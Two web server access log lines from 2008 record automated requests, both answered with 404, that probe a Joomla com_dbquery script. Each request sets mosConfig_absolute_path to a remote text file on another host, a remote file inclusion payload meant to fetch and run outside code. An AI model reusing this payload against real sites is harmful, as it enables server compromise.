66.203.165.110 - - [26/Oct/2008:09:54:08 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.2ebook.com/dtech/test/ipv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.203.165.110 - - [26/Oct/2008:09:54:08 -0700] "GET /logs/access_080518.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.2ebook.com/dtech/test/ipv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
